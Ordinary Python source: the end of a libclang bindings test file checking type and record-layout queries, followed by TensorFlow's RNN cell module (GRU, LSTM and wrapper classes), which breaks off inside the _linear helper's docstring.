    tu = get_tu('int i; void f();')
    i = get_cursor(tu, 'i')
    f = get_cursor(tu, 'f')

    assert i is not None
    assert f is not None

    assert i.type.is_pod()
    assert not f.type.is_pod()

def test_function_variadic():
    """Ensure Type.is_function_variadic works."""
    source ="""
#include <stdarg.h>

void foo(int a, ...);
void bar(int a, int b);
"""

    tu = get_tu(source)
    foo = get_cursor(tu, 'foo')
    bar = get_cursor(tu, 'bar')

    assert foo is not None
    assert bar is not None

    assert isinstance(foo.type.is_function_variadic(), bool)
    assert foo.type.is_function_variadic()
    assert not bar.type.is_function_variadic()

def test_element_type():
    """Ensure Type.element_type works."""
    tu = get_tu('int c[5]; int i[]; int x; int v[x];')
    c = get_cursor(tu, 'c')
    i = get_cursor(tu, 'i')
    v = get_cursor(tu, 'v')
    assert c is not None
    assert i is not None
    assert v is not None

    # constant, incomplete, and variable-length arrays all expose element_type
    assert c.type.kind == TypeKind.CONSTANTARRAY
    assert c.type.element_type.kind == TypeKind.INT
    assert i.type.kind == TypeKind.INCOMPLETEARRAY
    assert i.type.element_type.kind == TypeKind.INT
    assert v.type.kind == TypeKind.VARIABLEARRAY
    assert v.type.element_type.kind == TypeKind.INT

@raises(Exception)
def test_invalid_element_type():
    """Ensure Type.element_type raises if type doesn't have elements."""
    tu = get_tu('int i;')
    i = get_cursor(tu, 'i')
    assert i is not None
    i.element_type

def test_element_count():
    """Ensure Type.element_count works."""
    tu = get_tu('int i[5]; int j;')
    i = get_cursor(tu, 'i')
    j = get_cursor(tu, 'j')

    assert i is not None
    assert j is not None

    assert i.type.element_count == 5

    # A non-array type must raise when element_count is accessed.
    try:
        j.type.element_count
        assert False
    except:
        assert True

def test_is_volatile_qualified():
    """Ensure Type.is_volatile_qualified works."""
    tu = get_tu('volatile int i = 4; int j = 2;')

    i = get_cursor(tu, 'i')
    j = get_cursor(tu, 'j')

    assert i is not None
    assert j is not None

    assert isinstance(i.type.is_volatile_qualified(), bool)
    assert i.type.is_volatile_qualified()
    assert not j.type.is_volatile_qualified()

def test_is_restrict_qualified():
    """Ensure Type.is_restrict_qualified works."""
    tu = get_tu('struct s { void * restrict i; void * j; };')

    i = get_cursor(tu, 'i')
    j = get_cursor(tu, 'j')

    assert i is not None
    assert j is not None

    assert isinstance(i.type.is_restrict_qualified(), bool)
    assert i.type.is_restrict_qualified()
    assert not j.type.is_restrict_qualified()

def test_record_layout():
    """Ensure Cursor.type.get_size, Cursor.type.get_align and
    Cursor.type.get_offset works."""

    source ="""
struct a {
    long a1;
    long a2:3;
    long a3:4;
    long long a4;
};
"""
    # (flags, (align, total size, and bit offsets of a1..a4)) per target ABI.
    tries=[(['-target','i386-linux-gnu'],(4,16,0,32,35,64)),
           (['-target','nvptx64-unknown-unknown'],(8,24,0,64,67,128)),
           (['-target','i386-pc-win32'],(8,16,0,32,35,64)),
           (['-target','msp430-none-none'],(2,14,0,32,35,48))]
    for flags, values in tries:
        align,total,a1,a2,a3,a4 = values

        tu = get_tu(source, flags=flags)
        teststruct = get_cursor(tu, 'a')
        fields = list(teststruct.get_children())

        assert teststruct.type.get_align() == align
        assert teststruct.type.get_size() == total
        assert teststruct.type.get_offset(fields[0].spelling) == a1
        assert teststruct.type.get_offset(fields[1].spelling) == a2
        assert teststruct.type.get_offset(fields[2].spelling) == a3
        assert teststruct.type.get_offset(fields[3].spelling) == a4
        assert fields[0].is_bitfield() == False
        assert fields[1].is_bitfield() == True
        assert fields[1].get_bitfield_width() == 3
        assert fields[2].is_bitfield() == True
        assert fields[2].get_bitfield_width() == 4
        assert fields[3].is_bitfield() == False

def test_offset():
    """Ensure Cursor.get_record_field_offset works in anonymous records"""
    source="""
struct Test {
  struct {
    int bariton;
    union {
      int foo;
    };
  };
  int bar;
};"""
    tries=[(['-target','i386-linux-gnu'],(4,16,0,32,64)),
           (['-target','nvptx64-unknown-unknown'],(8,24,0,32,64)),
           (['-target','i386-pc-win32'],(8,16,0,32,64)),
           (['-target','msp430-none-none'],(2,14,0,32,64))]
    for flags, values in tries:
        align,total,bariton,foo,bar = values
        # NOTE(review): `flags` is unpacked but never passed to get_tu(), and
        # align/total are never asserted - every iteration parses with default
        # flags. Compare with test_record_layout above; confirm intent.
        tu = get_tu(source)
        teststruct = get_cursor(tu, 'Test')
        fields = list(teststruct.get_children())

        assert teststruct.type.get_offset("bariton") == bariton
        assert teststruct.type.get_offset("foo") == foo
        assert teststruct.type.get_offset("bar") == bar

def test_decay():
    """Ensure decayed types are handled as the original type"""
    tu = get_tu("void foo(int a[]);")
    foo = get_cursor(tu, 'foo')

    # The parameter decays to a pointer in C, but the bindings report the
    # written array type.
    a = foo.type.argument_types()[0]
    assert a.kind == TypeKind.INCOMPLETEARRAY
    assert a.element_type.kind == TypeKind.INT
    assert a.get_canonical().kind == TypeKind.INCOMPLETEARRAY
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""Module for constructing RNN Cells.

## Base interface for all RNN Cells

@@RNNCell

## RNN Cells for use with TensorFlow's core RNN methods

@@BasicRNNCell
@@BasicLSTMCell
@@GRUCell
@@LSTMCell

## Classes storing split `RNNCell` state

@@LSTMStateTuple

## RNN Cell wrappers (RNNCells that wrap other RNNCells)

@@MultiRNNCell
@@DropoutWrapper
@@EmbeddingWrapper
@@InputProjectionWrapper
@@OutputProjectionWrapper
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import math

from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope as vs

from tensorflow.python.ops.math_ops import sigmoid
from tensorflow.python.ops.math_ops import tanh

from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest


def _state_size_with_prefix(state_size, prefix=None):
  """Helper function that enables int or TensorShape shape specification.

  This function takes a size specification, which can be an integer or a
  TensorShape, and converts it into a list of integers. One may specify any
  additional dimensions that precede the final state size specification.

  Args:
    state_size: TensorShape or int that specifies the size of a tensor.
    prefix: optional additional list of dimensions to prepend.

  Returns:
    result_state_size: list of dimensions the resulting tensor size.
  """
  result_state_size = tensor_shape.as_shape(state_size).as_list()
  if prefix is not None:
    if not isinstance(prefix, list):
      raise TypeError("prefix of _state_size_with_prefix should be a list.")
    result_state_size = prefix + result_state_size
  return result_state_size


class RNNCell(object):
  """Abstract object representing an RNN cell.

  The definition of cell in this package differs from the definition used in
  the literature. In the literature, cell refers to an object with a single
  scalar output. The definition in this package refers to a horizontal array
  of such units.

  An RNN cell, in the most abstract setting, is anything that has a state and
  performs some operation that takes a matrix of inputs. This operation
  results in an output matrix with `self.output_size` columns. If
  `self.state_size` is an integer, this operation also results in a new state
  matrix with `self.state_size` columns. If `self.state_size` is a tuple of
  integers, then it results in a tuple of `len(state_size)` state matrices,
  each with a column size corresponding to values in `state_size`.

  This module provides a number of basic commonly used RNN cells, such as
  LSTM (Long Short Term Memory) or GRU (Gated Recurrent Unit), and a number
  of operators that allow adding dropouts, projections, or embeddings for
  inputs. Constructing multi-layer cells is supported by the class
  `MultiRNNCell`, or by calling the `rnn` ops several times. Every `RNNCell`
  must have the properties below and implement `__call__` with the following
  signature.
  """

  def __call__(self, inputs, state, scope=None):
    """Run this RNN cell on inputs, starting from the given state.

    Args:
      inputs: `2-D` tensor with shape `[batch_size x input_size]`.
      state: if `self.state_size` is an integer, this should be a `2-D Tensor`
        with shape `[batch_size x self.state_size]`.  Otherwise, if
        `self.state_size` is a tuple of integers, this should be a tuple
        with shapes `[batch_size x s] for s in self.state_size`.
      scope: VariableScope for the created subgraph; defaults to class name.

    Returns:
      A pair containing:

      - Output: A `2-D` tensor with shape `[batch_size x self.output_size]`.
      - New state: Either a single `2-D` tensor, or a tuple of tensors matching
        the arity and shapes of `state`.
    """
    raise NotImplementedError("Abstract method")

  @property
  def state_size(self):
    """size(s) of state(s) used by this cell.

    It can be represented by an Integer, a TensorShape or a tuple of Integers
    or TensorShapes.
    """
    raise NotImplementedError("Abstract method")

  @property
  def output_size(self):
    """Integer or TensorShape: size of outputs produced by this cell."""
    raise NotImplementedError("Abstract method")

  def zero_state(self, batch_size, dtype):
    """Return zero-filled state tensor(s).

    Args:
      batch_size: int, float, or unit Tensor representing the batch size.
      dtype: the data type to use for the state.

    Returns:
      If `state_size` is an int or TensorShape, then the return value is a
      `N-D` tensor of shape `[batch_size x state_size]` filled with zeros.

      If `state_size` is a nested list or tuple, then the return value is
      a nested list or tuple (of the same structure) of `2-D` tensors with
      the shapes `[batch_size x s]` for each s in `state_size`.
    """
    state_size = self.state_size
    if nest.is_sequence(state_size):
      # Build one zero tensor per flattened state component, then re-nest
      # into the same structure as `state_size`.
      state_size_flat = nest.flatten(state_size)
      zeros_flat = [
          array_ops.zeros(
              array_ops.pack(_state_size_with_prefix(s, prefix=[batch_size])),
              dtype=dtype)
          for s in state_size_flat]
      for s, z in zip(state_size_flat, zeros_flat):
        # Static shape uses None for the (dynamic) batch dimension.
        z.set_shape(_state_size_with_prefix(s, prefix=[None]))
      zeros = nest.pack_sequence_as(structure=state_size,
                                    flat_sequence=zeros_flat)
    else:
      zeros_size = _state_size_with_prefix(state_size, prefix=[batch_size])
      zeros = array_ops.zeros(array_ops.pack(zeros_size), dtype=dtype)
      zeros.set_shape(_state_size_with_prefix(state_size, prefix=[None]))

    return zeros


class BasicRNNCell(RNNCell):
  """The most basic RNN cell."""

  def __init__(self, num_units, input_size=None, activation=tanh):
    if input_size is not None:
      logging.warn("%s: The input_size parameter is deprecated.", self)
    self._num_units = num_units
    self._activation = activation

  @property
  def state_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    """Most basic RNN: output = new_state = act(W * input + U * state + B)."""
    with vs.variable_scope(scope or "basic_rnn_cell"):
      output = self._activation(
          _linear([inputs, state], self._num_units, True, scope=scope))
    return output, output


class GRUCell(RNNCell):
  """Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""

  def __init__(self, num_units, input_size=None, activation=tanh):
    if input_size is not None:
      logging.warn("%s: The input_size parameter is deprecated.", self)
    self._num_units = num_units
    self._activation = activation

  @property
  def state_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    """Gated recurrent unit (GRU) with nunits cells."""
    with vs.variable_scope(scope or "gru_cell"):
      with vs.variable_scope("gates"):  # Reset gate and update gate.
        # We start with bias of 1.0 to not reset and not update.
        r, u = array_ops.split(
            1, 2,
            _linear([inputs, state], 2 * self._num_units, True, 1.0,
                    scope=scope))
        r, u = sigmoid(r), sigmoid(u)
      with vs.variable_scope("candidate"):
        c = self._activation(_linear([inputs, r * state],
                                     self._num_units, True,
                                     scope=scope))
      new_h = u * state + (1 - u) * c
    return new_h, new_h


_LSTMStateTuple = collections.namedtuple("LSTMStateTuple", ("c", "h"))


class LSTMStateTuple(_LSTMStateTuple):
  """Tuple used by LSTM Cells for `state_size`, `zero_state`, and output state.

  Stores two elements: `(c, h)`, in that order.

  Only used when `state_is_tuple=True`.
  """
  __slots__ = ()

  @property
  def dtype(self):
    (c, h) = self
    if not c.dtype == h.dtype:
      raise TypeError("Inconsistent internal state: %s vs %s" %
                      (str(c.dtype), str(h.dtype)))
    return c.dtype


class BasicLSTMCell(RNNCell):
  """Basic LSTM recurrent network cell.

  The implementation is based on: http://arxiv.org/abs/1409.2329.

  We add forget_bias (default: 1) to the biases of the forget gate in order to
  reduce the scale of forgetting in the beginning of the training.

  It does not allow cell clipping, a projection layer, and does not
  use peep-hole connections: it is the basic baseline.

  For advanced models, please use the full LSTMCell that follows.
  """

  def __init__(self, num_units, forget_bias=1.0, input_size=None,
               state_is_tuple=True, activation=tanh):
    """Initialize the basic LSTM cell.

    Args:
      num_units: int, The number of units in the LSTM cell.
      forget_bias: float, The bias added to forget gates (see above).
      input_size: Deprecated and unused.
      state_is_tuple: If True, accepted and returned states are 2-tuples of
        the `c_state` and `m_state`.  If False, they are concatenated
        along the column axis.  The latter behavior will soon be deprecated.
      activation: Activation function of the inner states.
    """
    if not state_is_tuple:
      logging.warn("%s: Using a concatenated state is slower and will soon be "
                   "deprecated.  Use state_is_tuple=True.", self)
    if input_size is not None:
      logging.warn("%s: The input_size parameter is deprecated.", self)
    self._num_units = num_units
    self._forget_bias = forget_bias
    self._state_is_tuple = state_is_tuple
    self._activation = activation

  @property
  def state_size(self):
    return (LSTMStateTuple(self._num_units, self._num_units)
            if self._state_is_tuple else 2 * self._num_units)

  @property
  def output_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    """Long short-term memory cell (LSTM)."""
    with vs.variable_scope(scope or "basic_lstm_cell"):
      # Parameters of gates are concatenated into one multiply for efficiency.
      if self._state_is_tuple:
        c, h = state
      else:
        c, h = array_ops.split(1, 2, state)
      concat = _linear([inputs, h], 4 * self._num_units, True, scope=scope)

      # i = input_gate, j = new_input, f = forget_gate, o = output_gate
      i, j, f, o = array_ops.split(1, 4, concat)

      new_c = (c * sigmoid(f + self._forget_bias) + sigmoid(i) *
               self._activation(j))
      new_h = self._activation(new_c) * sigmoid(o)

      if self._state_is_tuple:
        new_state = LSTMStateTuple(new_c, new_h)
      else:
        new_state = array_ops.concat(1, [new_c, new_h])
      return new_h, new_state


class LSTMCell(RNNCell):
  """Long short-term memory unit (LSTM) recurrent network cell.

  The default non-peephole implementation is based on:

    http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf

  S. Hochreiter and J. Schmidhuber.
  "Long Short-Term Memory". Neural Computation, 9(8):1735-1780, 1997.

  The peephole implementation is based on:

    https://research.google.com/pubs/archive/43905.pdf

  Hasim Sak, Andrew Senior, and Francoise Beaufays.
  "Long short-term memory recurrent neural network architectures for
   large scale acoustic modeling." INTERSPEECH, 2014.

  The class uses optional peep-hole connections, optional cell clipping, and
  an optional projection layer.
  """

  def __init__(self, num_units, input_size=None,
               use_peepholes=False, cell_clip=None,
               initializer=None, num_proj=None, proj_clip=None,
               num_unit_shards=None, num_proj_shards=None,
               forget_bias=1.0, state_is_tuple=True,
               activation=tanh):
    """Initialize the parameters for an LSTM cell.

    Args:
      num_units: int, The number of units in the LSTM cell
      input_size: Deprecated and unused.
      use_peepholes: bool, set True to enable diagonal/peephole connections.
      cell_clip: (optional) A float value, if provided the cell state is
        clipped by this value prior to the cell output activation.
      initializer: (optional) The initializer to use for the weight and
        projection matrices.
      num_proj: (optional) int, The output dimensionality for the projection
        matrices.  If None, no projection is performed.
      proj_clip: (optional) A float value.  If `num_proj > 0` and `proj_clip`
        is provided, then the projected values are clipped elementwise to
        within `[-proj_clip, proj_clip]`.
      num_unit_shards: Deprecated, will be removed by Jan. 2017.
        Use a variable_scope partitioner instead.
      num_proj_shards: Deprecated, will be removed by Jan. 2017.
        Use a variable_scope partitioner instead.
      forget_bias: Biases of the forget gate are initialized by default to 1
        in order to reduce the scale of forgetting at the beginning of
        the training.
      state_is_tuple: If True, accepted and returned states are 2-tuples of
        the `c_state` and `m_state`.  If False, they are concatenated
        along the column axis.  This latter behavior will soon be deprecated.
      activation: Activation function of the inner states.
    """
    if not state_is_tuple:
      logging.warn("%s: Using a concatenated state is slower and will soon be "
                   "deprecated.  Use state_is_tuple=True.", self)
    if input_size is not None:
      logging.warn("%s: The input_size parameter is deprecated.", self)
    if num_unit_shards is not None or num_proj_shards is not None:
      logging.warn(
          "%s: The num_unit_shards and proj_unit_shards parameters are "
          "deprecated and will be removed in Jan 2017.  "
          "Use a variable scope with a partitioner instead.", self)

    self._num_units = num_units
    self._use_peepholes = use_peepholes
    self._cell_clip = cell_clip
    self._initializer = initializer
    self._num_proj = num_proj
    self._proj_clip = proj_clip
    self._num_unit_shards = num_unit_shards
    self._num_proj_shards = num_proj_shards
    self._forget_bias = forget_bias
    self._state_is_tuple = state_is_tuple
    self._activation = activation

    if num_proj:
      self._state_size = (
          LSTMStateTuple(num_units, num_proj)
          if state_is_tuple else num_units + num_proj)
      self._output_size = num_proj
    else:
      self._state_size = (
          LSTMStateTuple(num_units, num_units)
          if state_is_tuple else 2 * num_units)
      self._output_size = num_units

  @property
  def state_size(self):
    return self._state_size

  @property
  def output_size(self):
    return self._output_size

  def __call__(self, inputs, state, scope=None):
    """Run one step of LSTM.

    Args:
      inputs: input Tensor, 2D, batch x num_units.
      state: if `state_is_tuple` is False, this must be a state Tensor,
        `2-D, batch x state_size`.  If `state_is_tuple` is True, this must be a
        tuple of state Tensors, both `2-D`, with column sizes `c_state` and
        `m_state`.
      scope: VariableScope for the created subgraph; defaults to "lstm_cell".

    Returns:
      A tuple containing:

      - A `2-D, [batch x output_dim]`, Tensor representing the output of the
        LSTM after reading `inputs` when previous state was `state`.
        Here output_dim is:
           num_proj if num_proj was set,
           num_units otherwise.
      - Tensor(s) representing the new state of LSTM after reading `inputs` when
        the previous state was `state`.  Same type and shape(s) as `state`.

    Raises:
      ValueError: If input size cannot be inferred from inputs via
        static shape inference.
    """
    num_proj = self._num_units if self._num_proj is None else self._num_proj

    if self._state_is_tuple:
      (c_prev, m_prev) = state
    else:
      c_prev = array_ops.slice(state, [0, 0], [-1, self._num_units])
      m_prev = array_ops.slice(state, [0, self._num_units], [-1, num_proj])

    dtype = inputs.dtype
    input_size = inputs.get_shape().with_rank(2)[1]
    if input_size.value is None:
      raise ValueError("Could not infer input size from inputs.get_shape()[-1]")
    with vs.variable_scope(scope or "lstm_cell",
                           initializer=self._initializer) as unit_scope:
      if self._num_unit_shards is not None:
        unit_scope.set_partitioner(
            partitioned_variables.fixed_size_partitioner(
                self._num_unit_shards))
      # i = input_gate, j = new_input, f = forget_gate, o = output_gate
      lstm_matrix = _linear([inputs, m_prev], 4 * self._num_units, bias=True,
                            scope=scope)
      i, j, f, o = array_ops.split(1, 4, lstm_matrix)

      # Diagonal connections
      if self._use_peepholes:
        with vs.variable_scope(unit_scope) as projection_scope:
          if self._num_unit_shards is not None:
            # Peephole weights are per-unit diagonals; they must not be
            # sharded along with the gate matrices.
            projection_scope.set_partitioner(None)
          w_f_diag = vs.get_variable(
              "w_f_diag", shape=[self._num_units], dtype=dtype)
          w_i_diag = vs.get_variable(
              "w_i_diag", shape=[self._num_units], dtype=dtype)
          w_o_diag = vs.get_variable(
              "w_o_diag", shape=[self._num_units], dtype=dtype)

      if self._use_peepholes:
        c = (sigmoid(f + self._forget_bias + w_f_diag * c_prev) * c_prev +
             sigmoid(i + w_i_diag * c_prev) * self._activation(j))
      else:
        c = (sigmoid(f + self._forget_bias) * c_prev + sigmoid(i) *
             self._activation(j))

      if self._cell_clip is not None:
        # pylint: disable=invalid-unary-operand-type
        c = clip_ops.clip_by_value(c, -self._cell_clip, self._cell_clip)
        # pylint: enable=invalid-unary-operand-type

      if self._use_peepholes:
        m = sigmoid(o + w_o_diag * c) * self._activation(c)
      else:
        m = sigmoid(o) * self._activation(c)

      if self._num_proj is not None:
        with vs.variable_scope("projection") as proj_scope:
          if self._num_proj_shards is not None:
            proj_scope.set_partitioner(
                partitioned_variables.fixed_size_partitioner(
                    self._num_proj_shards))
          m = _linear(m, self._num_proj, bias=False, scope=scope)

          if self._proj_clip is not None:
            # pylint: disable=invalid-unary-operand-type
            m = clip_ops.clip_by_value(m, -self._proj_clip, self._proj_clip)
            # pylint: enable=invalid-unary-operand-type

    new_state = (LSTMStateTuple(c, m) if self._state_is_tuple else
                 array_ops.concat(1, [c, m]))
    return m, new_state


class OutputProjectionWrapper(RNNCell):
  """Operator adding an output projection to the given cell.

  Note: in many cases it may be more efficient to not use this wrapper,
  but instead concatenate the whole sequence of your outputs in time,
  do the projection on this batch-concatenated sequence, then split it
  if needed or directly feed into a softmax.
  """

  def __init__(self, cell, output_size):
    """Create a cell with output projection.

    Args:
      cell: an RNNCell, a projection to output_size is added to it.
      output_size: integer, the size of the output after projection.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if output_size is not positive.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    if output_size < 1:
      raise ValueError("Parameter output_size must be > 0: %d." % output_size)
    self._cell = cell
    self._output_size = output_size

  @property
  def state_size(self):
    return self._cell.state_size

  @property
  def output_size(self):
    return self._output_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell and output projection on inputs, starting from state."""
    output, res_state = self._cell(inputs, state)
    # Default scope: "OutputProjectionWrapper"
    with vs.variable_scope(scope or "output_projection_wrapper"):
      projected = _linear(output, self._output_size, True, scope=scope)
    return projected, res_state


class InputProjectionWrapper(RNNCell):
  """Operator adding an input projection to the given cell.

  Note: in many cases it may be more efficient to not use this wrapper,
  but instead concatenate the whole sequence of your inputs in time,
  do the projection on this batch-concatenated sequence, then split it.
  """

  def __init__(self, cell, num_proj, input_size=None):
    """Create a cell with input projection.

    Args:
      cell: an RNNCell, a projection of inputs is added before it.
      num_proj: Python integer.  The dimension to project to.
      input_size: Deprecated and unused.

    Raises:
      TypeError: if cell is not an RNNCell.
    """
    if input_size is not None:
      logging.warn("%s: The input_size parameter is deprecated.", self)
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    self._cell = cell
    self._num_proj = num_proj

  @property
  def state_size(self):
    return self._cell.state_size

  @property
  def output_size(self):
    return self._cell.output_size

  def __call__(self, inputs, state, scope=None):
    """Run the input projection and then the cell."""
    # Default scope: "InputProjectionWrapper"
    with vs.variable_scope(scope or "input_projection_wrapper"):
      projected = _linear(inputs, self._num_proj, True, scope=scope)
    return self._cell(projected, state)


class DropoutWrapper(RNNCell):
  """Operator adding dropout to inputs and outputs of the given cell."""

  def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0,
               seed=None):
    """Create a cell with added input and/or output dropout.

    Dropout is never used on the state.

    Args:
      cell: an RNNCell, a projection to output_size is added to it.
      input_keep_prob: unit Tensor or float between 0 and 1, input keep
        probability; if it is float and 1, no input dropout will be added.
      output_keep_prob: unit Tensor or float between 0 and 1, output keep
        probability; if it is float and 1, no output dropout will be added.
      seed: (optional) integer, the randomness seed.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if keep_prob is not between 0 and 1.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not a RNNCell.")
    # FIX: these messages previously used %d, which truncates a float keep
    # probability (e.g. 0.5 was reported as "0").
    if (isinstance(input_keep_prob, float) and
        not (input_keep_prob >= 0.0 and input_keep_prob <= 1.0)):
      raise ValueError("Parameter input_keep_prob must be between 0 and 1: %f"
                       % input_keep_prob)
    if (isinstance(output_keep_prob, float) and
        not (output_keep_prob >= 0.0 and output_keep_prob <= 1.0)):
      raise ValueError("Parameter output_keep_prob must be between 0 and 1: %f"
                       % output_keep_prob)
    self._cell = cell
    self._input_keep_prob = input_keep_prob
    self._output_keep_prob = output_keep_prob
    self._seed = seed

  @property
  def state_size(self):
    return self._cell.state_size

  @property
  def output_size(self):
    return self._cell.output_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell with the declared dropouts."""
    # A non-float keep_prob is a Tensor, in which case dropout is always
    # applied (its value is only known at run time).
    if (not isinstance(self._input_keep_prob, float) or
        self._input_keep_prob < 1):
      inputs = nn_ops.dropout(inputs, self._input_keep_prob, seed=self._seed)
    output, new_state = self._cell(inputs, state, scope)
    if (not isinstance(self._output_keep_prob, float) or
        self._output_keep_prob < 1):
      output = nn_ops.dropout(output, self._output_keep_prob, seed=self._seed)
    return output, new_state


class EmbeddingWrapper(RNNCell):
  """Operator adding input embedding to the given cell.

  Note: in many cases it may be more efficient to not use this wrapper,
  but instead concatenate the whole sequence of your inputs in time,
  do the embedding on this batch-concatenated sequence, then split it and
  feed into your RNN.
  """

  def __init__(self, cell, embedding_classes, embedding_size, initializer=None):
    """Create a cell with an added input embedding.

    Args:
      cell: an RNNCell, an embedding will be put before its inputs.
      embedding_classes: integer, how many symbols will be embedded.
      embedding_size: integer, the size of the vectors we embed into.
      initializer: an initializer to use when creating the embedding;
        if None, the initializer from variable scope or a default one is used.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if embedding_classes is not positive.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    if embedding_classes <= 0 or embedding_size <= 0:
      raise ValueError("Both embedding_classes and embedding_size must be > 0: "
                       "%d, %d." % (embedding_classes, embedding_size))
    self._cell = cell
    self._embedding_classes = embedding_classes
    self._embedding_size = embedding_size
    self._initializer = initializer

  @property
  def state_size(self):
    return self._cell.state_size

  @property
  def output_size(self):
    return self._cell.output_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell on embedded inputs."""
    with vs.variable_scope(scope or "embedding_wrapper"):  # "EmbeddingWrapper"
      with ops.device("/cpu:0"):
        if self._initializer:
          initializer = self._initializer
        elif vs.get_variable_scope().initializer:
          initializer = vs.get_variable_scope().initializer
        else:
          # Default initializer for embeddings should have variance=1.
          sqrt3 = math.sqrt(3)  # Uniform(-sqrt(3), sqrt(3)) has variance=1.
          initializer = init_ops.random_uniform_initializer(-sqrt3, sqrt3)

        if type(state) is tuple:
          data_type = state[0].dtype
        else:
          data_type = state.dtype

        embedding = vs.get_variable(
            "embedding", [self._embedding_classes, self._embedding_size],
            initializer=initializer,
            dtype=data_type)
        embedded = embedding_ops.embedding_lookup(
            embedding, array_ops.reshape(inputs, [-1]))
    return self._cell(embedded, state)


class MultiRNNCell(RNNCell):
  """RNN cell composed sequentially of multiple simple cells."""

  def __init__(self, cells, state_is_tuple=True):
    """Create a RNN cell composed sequentially of a number of RNNCells.

    Args:
      cells: list of RNNCells that will be composed in this order.
      state_is_tuple: If True, accepted and returned states are n-tuples, where
        `n = len(cells)`.  If False, the states are all concatenated along the
        column axis.  This latter behavior will soon be deprecated.

    Raises:
      ValueError: if cells is empty (not allowed), or at least one of the cells
        returns a state tuple but the flag `state_is_tuple` is `False`.
    """
    if not cells:
      raise ValueError("Must specify at least one cell for MultiRNNCell.")
    self._cells = cells
    self._state_is_tuple = state_is_tuple
    if not state_is_tuple:
      if any(nest.is_sequence(c.state_size) for c in self._cells):
        raise ValueError("Some cells return tuples of states, but the flag "
                         "state_is_tuple is not set.  State sizes are: %s"
                         % str([c.state_size for c in self._cells]))

  @property
  def state_size(self):
    if self._state_is_tuple:
      return tuple(cell.state_size for cell in self._cells)
    else:
      return sum([cell.state_size for cell in self._cells])

  @property
  def output_size(self):
    return self._cells[-1].output_size

  def __call__(self, inputs, state, scope=None):
    """Run this multi-layer cell on inputs, starting from state."""
    with vs.variable_scope(scope or "multi_rnn_cell"):
      cur_state_pos = 0
      cur_inp = inputs
      new_states = []
      for i, cell in enumerate(self._cells):
        with vs.variable_scope("cell_%d" % i):
          if self._state_is_tuple:
            if not nest.is_sequence(state):
              raise ValueError(
                  "Expected state to be a tuple of length %d, but received: %s"
                  % (len(self.state_size), state))
            cur_state = state[i]
          else:
            # Slice this cell's state out of the concatenated state tensor.
            cur_state = array_ops.slice(
                state, [0, cur_state_pos], [-1, cell.state_size])
            cur_state_pos += cell.state_size
          cur_inp, new_state = cell(cur_inp, cur_state)
          new_states.append(new_state)
    new_states = (tuple(new_states) if self._state_is_tuple else
                  array_ops.concat(1, new_states))
    return cur_inp, new_states


class _SlimRNNCell(RNNCell):
  """A simple wrapper for slim.rnn_cells."""

  def __init__(self, cell_fn):
    """Create a SlimRNNCell from a cell_fn.

    Args:
      cell_fn: a function which takes (inputs, state, scope) and produces the
        outputs and the new_state.  Additionally when called with inputs=None
        and state=None it should return (initial_outputs, initial_state).

    Raises:
      TypeError: if cell_fn is not callable
      ValueError: if cell_fn cannot produce a valid initial state.
    """
    if not callable(cell_fn):
      # FIX: the original passed cell_fn as a second argument to TypeError
      # (logging-style), producing an unformatted tuple message.
      raise TypeError("cell_fn %s needs to be callable" % cell_fn)
    self._cell_fn = cell_fn
    # NOTE(review): assumes cell_fn is a functools.partial (`.func`) —
    # a plain function would raise AttributeError here; confirm callers.
    self._cell_name = cell_fn.func.__name__
    init_output, init_state = self._cell_fn(None, None)
    output_shape = init_output.get_shape()
    state_shape = init_state.get_shape()
    self._output_size = output_shape.with_rank(2)[1].value
    self._state_size = state_shape.with_rank(2)[1].value
    if self._output_size is None:
      raise ValueError("Initial output created by %s has invalid shape %s" %
                       (self._cell_name, output_shape))
    if self._state_size is None:
      raise ValueError("Initial state created by %s has invalid shape %s" %
                       (self._cell_name, state_shape))

  @property
  def state_size(self):
    return self._state_size

  @property
  def output_size(self):
    return self._output_size

  def __call__(self, inputs, state, scope=None):
    scope = scope or self._cell_name
    output, state = self._cell_fn(inputs, state, scope=scope)
    return output, state


def _linear(args, output_size, bias, bias_start=0.0, scope=None):
  """Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.

  Args:
    args: a 2D Tensor or a list of 2D, batch x n, Tensors.
    output_size: int, second dimension of W[i].
    bias: boolean, whether to add a bias term or not.
    bias_start: starting value to initialize the bias; 0 by default.
    scope: (optional) Variable scope to create parameters in.

  Returns:
    A 2D Tensor with shape [batch x output_size] equal to
    sum_i(args[i] * W[i]), where W[i]s are newly created matrices.

  Raises:
